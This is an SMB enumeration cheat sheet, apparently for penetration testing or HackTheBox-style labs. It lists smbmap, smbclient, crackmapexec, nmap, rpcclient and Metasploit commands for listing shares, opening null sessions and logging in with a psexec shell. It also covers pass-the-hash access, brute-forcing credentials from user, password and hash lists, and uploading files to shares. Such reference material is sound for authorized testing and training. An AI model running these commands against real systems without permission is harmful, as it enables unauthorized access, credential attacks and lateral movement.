SMB Enumeration

smbmap -H 10.10.10.10          //Check Privileges 

smbmap -H 10.10.10.10 -R --depth 5

smbclient -L //10.10.10.10/            //List Shares

smbclient //10.10.10.10/Users      //Interactive shell to a share 

smbclient  \\\\10.10.10.10\\share$     //Open a Null Session

smbclient //friendzone.htb/general -U ""    //see files inside

smbclient -N -L //10.10.10.10/      //List Shares as Null User

psexec.py [email protected]         //Enter pass later

smbmap -u Administrator -p '[email protected]' -H 10.10.10.10

smbclient -U 'administrator%[email protected]' \\\\\10.10.10.10\\c$

once logged in;

put filename               //can upload any file

#access SMB shares via Windows CMD
net view \\192.168.1.17 /All

#Using Kerberos ticket with Smbclient 
smbclient -k -L //10.10.10.10/ 

#Basic SMB & OS info
crackmapexec smb 10.10.10.10

#List Shares 
crackmapexec smb 10.10.10.10 --shares
#If the password needs to be changed
smbpasswd -U username -r 10.10.10.10


#access SMB using a hash
smbclient //10.10.10.10/NAME -U username --pw-nt-hash 07772ae654432cd618915793515asds 

#Starting SMB Server
sudo smbserver.py share $(pwd)

#Brute forcing SMB Creds
crackmapexec smb 10.10.10.10 -u users.txt -p passwords.txt

#passing blank creds via smb
crackmapexec smb 10.10.10.10 --shares -u '' -p ''

#Bruteforcing SMB using hashes
proxychains crackmapexec -t 15  smb 10.10.10.10 -u users -H hashes --no-bruteforce --continue-on-success 

SMB Enum using Nmap 

#SMB Users Enum
nmap --script smb-enum-users.nse -p445 IP_Address

#SMB OS Discovery
nmap --script smb-os-discovery IP_Address

#SMB Shares Enum
nmap --script smb-enum-shares -p139,445 IP_Address
nmap --script smb-enum-shares IP_Address

#SMB Vuln Scan
nmap --script smb-vuln* IP_Address

#SMB Shares Enum using RPCClient
rpcclient -U "" -N IP_Address
netshareenum
netshareenumall

#Enum Using Metasploit 
use auxiliary/scanner/smb/smb_enumshares
set rhosts IP_Address
exploit